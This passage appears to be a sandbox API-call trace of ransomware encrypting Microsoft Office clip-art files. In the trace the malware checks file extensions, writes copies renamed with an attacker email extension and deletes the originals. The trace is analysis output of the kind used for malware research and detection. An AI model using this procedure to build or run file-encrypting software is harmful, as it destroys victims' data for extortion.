[0054.580] lstrlenW (lpString=".rar") returned 4 [0054.580] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.580] lstrlenW (lpString=".bz2") returned 4 [0054.580] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.580] lstrlenW (lpString=".7z") returned 3 [0054.580] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.580] lstrlenW (lpString=".dbf") returned 4 [0054.580] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.580] lstrlenW (lpString=".1cd") returned 4 [0054.580] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.580] lstrlenW (lpString=".jpg") returned 4 [0054.580] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.580] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.581] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.581] GetLastError () returned 0x0 [0054.581] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x3f34, lpOverlapped=0x0) returned 1 [0054.583] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3f40, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x3f40, lpOverlapped=0x0) returned 1 [0054.584] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.584] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.584] SetEndOfFile (hFile=0x208) returned 1 [0054.584] CloseHandle (hObject=0x208) returned 1 [0054.584] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.584] SetEndOfFile (hFile=0x210) returned 1 [0054.585] CloseHandle (hObject=0x210) returned 1 [0054.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.585] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf")) returned 1 [0054.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0054.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0054.585] lstrlenW (lpString=".doc") returned 4 [0054.585] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.586] lstrlenW (lpString=".docx") returned 5 [0054.586] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.586] lstrlenW (lpString=".pdf") returned 4 [0054.586] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.586] lstrlenW (lpString=".xls") returned 4 [0054.586] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.586] lstrlenW (lpString=".xlsx") returned 5 [0054.586] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.586] lstrlenW (lpString=".ppt") returned 4 [0054.586] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0054.586] lstrlenW (lpString=".zip") returned 4 [0054.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.586] lstrlenW (lpString=".rar") returned 4 [0054.586] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.586] lstrlenW (lpString=".bz2") returned 4 [0054.586] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.586] lstrlenW (lpString=".7z") returned 3 [0054.586] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0054.586] lstrlenW (lpString=".dbf") returned 4 [0054.586] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0054.586] lstrlenW (lpString=".1cd") returned 4 [0054.586] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0054.586] lstrlenW (lpString=".jpg") returned 4 [0054.586] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.587] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.587] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.587] GetLastError () returned 0x0 [0054.587] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x4354, lpOverlapped=0x0) returned 1 [0054.589] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x4360, lpOverlapped=0x0) returned 1 [0054.590] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.590] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.590] SetEndOfFile (hFile=0x208) returned 1 [0054.590] CloseHandle (hObject=0x208) returned 1 [0054.590] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.590] SetEndOfFile (hFile=0x210) returned 1 [0054.591] CloseHandle (hObject=0x210) returned 1 [0054.591] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.591] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf")) returned 1 [0054.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0054.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0054.592] lstrlenW (lpString=".doc") returned 4 [0054.592] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.592] lstrlenW (lpString=".docx") returned 5 [0054.592] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.592] lstrlenW (lpString=".pdf") returned 4 [0054.592] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.592] lstrlenW (lpString=".xls") returned 4 [0054.592] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.592] lstrlenW (lpString=".xlsx") returned 5 [0054.592] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.592] lstrlenW (lpString=".ppt") returned 4 [0054.592] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0054.592] lstrlenW (lpString=".zip") returned 4 [0054.592] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.592] lstrlenW (lpString=".rar") returned 4 [0054.592] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.592] lstrlenW (lpString=".bz2") returned 4 [0054.592] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.592] lstrlenW (lpString=".7z") returned 3 [0054.592] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0054.592] lstrlenW (lpString=".dbf") returned 4 [0054.592] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0054.592] lstrlenW (lpString=".1cd") returned 4 [0054.593] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0054.593] lstrlenW (lpString=".jpg") returned 4 [0054.593] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.593] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.593] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.593] GetLastError () returned 0x0 [0054.593] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x3ef0, lpOverlapped=0x0) returned 1 [0054.595] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x3f00, lpOverlapped=0x0) returned 1 [0054.596] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.596] WriteFile (in: hFile=0x208, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.596] SetEndOfFile (hFile=0x208) returned 1 [0054.596] CloseHandle (hObject=0x208) returned 1 [0054.597] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.597] SetEndOfFile (hFile=0x210) returned 1 [0054.597] CloseHandle (hObject=0x210) returned 1 [0054.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.598] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf")) returned 1 [0054.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0054.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0054.598] lstrlenW (lpString=".doc") returned 4 [0054.598] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.598] lstrlenW (lpString=".docx") returned 5 [0054.598] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.598] lstrlenW (lpString=".pdf") returned 4 [0054.598] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.598] lstrlenW (lpString=".xls") returned 4 [0054.598] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.598] lstrlenW (lpString=".xlsx") returned 5 [0054.598] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.598] lstrlenW (lpString=".ppt") returned 4 [0054.598] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0054.598] lstrlenW (lpString=".zip") returned 4 [0054.598] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.598] lstrlenW (lpString=".rar") returned 4 [0054.598] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.599] lstrlenW (lpString=".bz2") returned 4 [0054.599] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.599] lstrlenW (lpString=".7z") returned 3 [0054.599] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0054.599] lstrlenW (lpString=".dbf") returned 4 [0054.599] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0054.599] lstrlenW (lpString=".1cd") returned 4 [0054.599] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0054.599] lstrlenW (lpString=".jpg") returned 4 [0054.599] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.360] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.360] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0056.383] GetLastError () returned 0x0 [0056.383] ReadFile (in: hFile=0x1f8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x4124, lpOverlapped=0x0) returned 1 [0056.392] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x4130, lpOverlapped=0x0) returned 1 [0056.394] ReadFile (in: hFile=0x1f8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.394] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.394] SetEndOfFile (hFile=0x1f0) returned 1 [0056.394] CloseHandle (hObject=0x1f0) returned 1 [0056.394] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.394] SetEndOfFile (hFile=0x1f8) returned 1 [0056.395] CloseHandle (hObject=0x1f8) returned 1 [0056.395] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.395] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf")) returned 1 [0056.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0056.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0056.396] lstrlenW (lpString=".doc") returned 4 [0056.396] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.396] lstrlenW (lpString=".docx") returned 5 [0056.396] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.396] lstrlenW (lpString=".pdf") returned 4 [0056.396] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.396] lstrlenW (lpString=".xls") returned 4 [0056.396] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.396] lstrlenW (lpString=".xlsx") returned 5 [0056.396] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.396] lstrlenW (lpString=".ppt") returned 4 [0056.396] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0056.396] lstrlenW (lpString=".zip") returned 4 [0056.396] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.396] lstrlenW (lpString=".rar") returned 4 [0056.396] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.396] lstrlenW (lpString=".bz2") returned 4 [0056.396] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.396] lstrlenW (lpString=".7z") returned 3 [0056.396] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0056.396] lstrlenW (lpString=".dbf") returned 4 [0056.396] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0056.396] lstrlenW (lpString=".1cd") returned 4 [0056.396] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63 [0056.396] lstrlenW (lpString=".jpg") returned 4 [0056.396] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.397] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=47786) returned 1 [0056.397] CloseHandle (hObject=0x1f8) returned 1 [0056.397] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf")) returned 0x20 [0056.397] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0056.397] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.397] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0056.398] GetLastError () returned 0x0 [0056.398] ReadFile (in: hFile=0x1f8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xbaaa, lpOverlapped=0x0) returned 1 [0056.400] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xbab0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xbab0, lpOverlapped=0x0) returned 1 [0056.402] ReadFile (in: hFile=0x1f8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.402] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.402] SetEndOfFile (hFile=0x1f0) returned 1 [0056.402] CloseHandle (hObject=0x1f0) returned 1 [0056.402] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.402] SetEndOfFile (hFile=0x1f8) returned 1 [0056.403] CloseHandle (hObject=0x1f8) returned 1 [0056.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.403] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf")) returned 1 [0056.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0056.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0056.404] lstrlenW (lpString=".doc") returned 4 [0056.404] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.404] lstrlenW (lpString=".docx") returned 5 [0056.404] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.404] lstrlenW (lpString=".pdf") returned 4 [0056.404] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.404] lstrlenW (lpString=".xls") returned 4 [0056.404] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.404] lstrlenW (lpString=".xlsx") returned 5 [0056.404] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.404] lstrlenW (lpString=".ppt") returned 4 [0056.404] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0056.404] lstrlenW (lpString=".zip") returned 4 [0056.404] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.404] lstrlenW (lpString=".rar") returned 4 [0056.404] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.404] lstrlenW (lpString=".bz2") returned 4 [0056.404] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.404] lstrlenW (lpString=".7z") returned 3 [0056.404] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0056.404] lstrlenW (lpString=".dbf") returned 4 [0056.404] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0056.404] lstrlenW (lpString=".1cd") returned 4 [0056.404] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0056.404] lstrlenW (lpString=".jpg") returned 4 [0056.404] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.405] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=14540) returned 1 [0056.405] CloseHandle 